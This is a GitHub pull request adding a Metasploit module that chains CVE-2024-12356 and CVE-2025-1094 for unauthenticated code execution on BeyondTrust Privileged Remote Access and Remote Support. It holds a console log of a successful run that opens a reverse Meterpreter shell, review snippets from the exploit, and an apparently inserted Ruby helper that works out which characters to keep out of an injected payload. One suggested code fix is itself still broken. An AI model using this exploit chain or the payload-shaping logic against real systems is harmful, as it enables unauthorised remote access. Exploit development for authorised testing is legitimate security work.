Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094) #19877

Open
wants to merge 10 commits into
base: master
Conversation

@sfewer-r7 (Contributor) commented Feb 13, 2025

Overview

This pull request adds an unauthenticated RCE exploit module targeting BeyondTrust Privileged Remote Access & Remote Support, leveraging CVE-2024-12356 + CVE-2025-1094.

CVE-2024-12356 is an argument injection issue in the BeyondTrust code base, and CVE-2025-1094 is a SQL injection issue in the PostgreSQL code base (shipped as a component in the BeyondTrust appliance).

The exploit can either leverage CVE-2024-12356 and CVE-2025-1094 together, or solely leverage CVE-2025-1094 (this is the default) for RCE. Arbitrary code execution is achieved with the privileges of the current site user (i.e. not root).

For a full technical analysis of the vulnerabilities, please read our AttackerKB Rapid7 Analysis.

Example

msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: mytestcompany
[*] Sending stage (3045380 bytes) to 192.168.86.105
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000

meterpreter > getuid
Server username: mytestcompany
meterpreter > sysinfo
Computer     : 192.168.86.105
OS           : Gentoo 2.14 (Linux 6.1.76-bt)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@smcintyre-r7 added labels Feb 14, 2025: module; rn-modules (release notes for new or majorly enhanced modules); hotness (Something we're really excited about)
…ndocumented API endpoint to discover the target site company name.
@msutovsky-r7 msutovsky-r7 self-assigned this Feb 14, 2025
@sfewer-r7 (Contributor, Author) commented:

Adding a comment here to mention that this module relies on #19834 - to fix an issue with WebSockets, so dropping the module into an older version of the framework won't work, you need to run MSF that has the WebSocket bug fix in it (MSF 6.4.47 and above).

'DisableNops' => true,
# Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
# getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
# We also want to avoid any forward slash characters if CVE-2024-12356 is being leveraged.
Contributor review comment, suggested change:
# We also want to avoid any forward slash characters if CVE-2024-12356 is being leveraged.
# We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.
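The comment above constrains the payload because it passes through pg_escape_string before reaching the injected query. The following is an added example, not the module's or the PR author's code: it models the escaping that PostgreSQL's PQescapeStringConn (and PHP's pg_escape_string on top of it) applies to a string literal, so you can see which bytes of a payload would be rewritten and therefore belong on the badchars list. Function names are my own; the comment's note about a server-side double-quote setting is not modelled. Single quotes are always doubled; backslashes are doubled only when the server runs with standard_conforming_strings = off.

```ruby
# Added example (not code from the PR). A minimal model of PostgreSQL
# string-literal escaping as performed by PQescapeStringConn / pg_escape_string.
def pg_escape_string_model(str, standard_conforming_strings: true)
  # A single quote inside a literal is always written as two single quotes.
  escaped = str.gsub("'") { "''" }
  # With standard_conforming_strings = off (the legacy, non-default setting),
  # a backslash is also doubled because the old literal syntax treats it as an
  # escape character.
  escaped = escaped.gsub("\\") { "\\\\" } unless standard_conforming_strings
  escaped
end

# Returns the distinct characters of +payload+ that escaping would rewrite,
# i.e. the characters that must be excluded (badchars) for the payload to reach
# the query unchanged. Order follows first occurrence in the payload.
def rewritten_chars(payload, standard_conforming_strings: true)
  payload.chars.uniq.reject do |c|
    pg_escape_string_model(c, standard_conforming_strings: standard_conforming_strings) == c
  end
end

# True when the payload passes through the escaping function untouched.
def survives_escaping?(payload, standard_conforming_strings: true)
  rewritten_chars(payload, standard_conforming_strings: standard_conforming_strings).empty?
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample string (not taken from the PR); it contains both a
  # single quote and a backslash so both rules are exercised.
  sample = "echo 'hi' > /tmp/x\\n"
  puts "escaped (default):  #{pg_escape_string_model(sample)}"
  puts "escaped (legacy):   #{pg_escape_string_model(sample, standard_conforming_strings: false)}"
  puts "rewritten (default): #{rewritten_chars(sample).inspect}"
  puts "rewritten (legacy):  #{rewritten_chars(sample, standard_conforming_strings: false).inspect}"
end
```

Running it on a candidate payload before encoding it tells you whether the single-quote rule alone is enough for the target's configuration, or whether backslashes have to be excluded as well.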


return CheckCode::Unknown('Connection failed') unless res

return CheckCode::Unknown("Unexpected response code #{res.code == 200}") unless res.code == 200
Contributor review comment, suggested change:
return CheckCode::Unknown("Unexpected response code #{res.code == 200}") unless res.code == 200
return CheckCode::Unknown("Unexpected response code #{res.code != 200}") unless res.code == 200

# 00000020 44 46 80 00 0a 91 07 81 32 34 2e 31 2e 32 00 82 |DF......24.1.2..|
# 00000030 00 00 00 00 67 8e 25 28 91 06 83 65 6e 2d 75 73 |....g.%(...en-us|

# First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we we use a regex to match this so we can ignore it.
Contributor review comment, suggested change:
# First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we we use a regex to match this so we can ignore it.
# First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we use a regex to match this so we can ignore it.
